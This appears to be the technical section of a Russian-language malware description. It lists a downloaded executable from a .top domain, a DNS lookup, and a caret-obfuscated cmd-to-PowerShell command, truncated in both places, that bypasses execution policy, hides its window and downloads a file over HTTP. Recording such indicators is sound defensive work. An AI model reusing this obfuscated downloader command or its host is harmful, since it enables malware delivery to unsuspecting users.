Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rsheL^l.e^Xe ^-^eXe^cUT^IO^Np^o^lICY bYpas^S^ -n^o^Pr^OFI^Le ^-^W^inDO^w^stYle^ h^idde^n (nEw-^o^b^jE^cT ^sY^s^t^e^M^.neT.^W^eBCli^E^n^t^)^.DO^Wnloa^D^f^ILe^(^'http:/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rsheL^l.e^Xe ^-^eXe^cUT^IO^Np^o^lICY bYpas^S^ -n^o^Pr^OFI^Le ^-^W^inDO^w^stYle^ h^idde^n (nEw-^o^b^jE^cT ^sY^s^t^e^M^.neT.^W^eBCli^E^n^t^)^.DO^Wnloa^D^f^ILe^(^'http:/...' (со скрытым окном)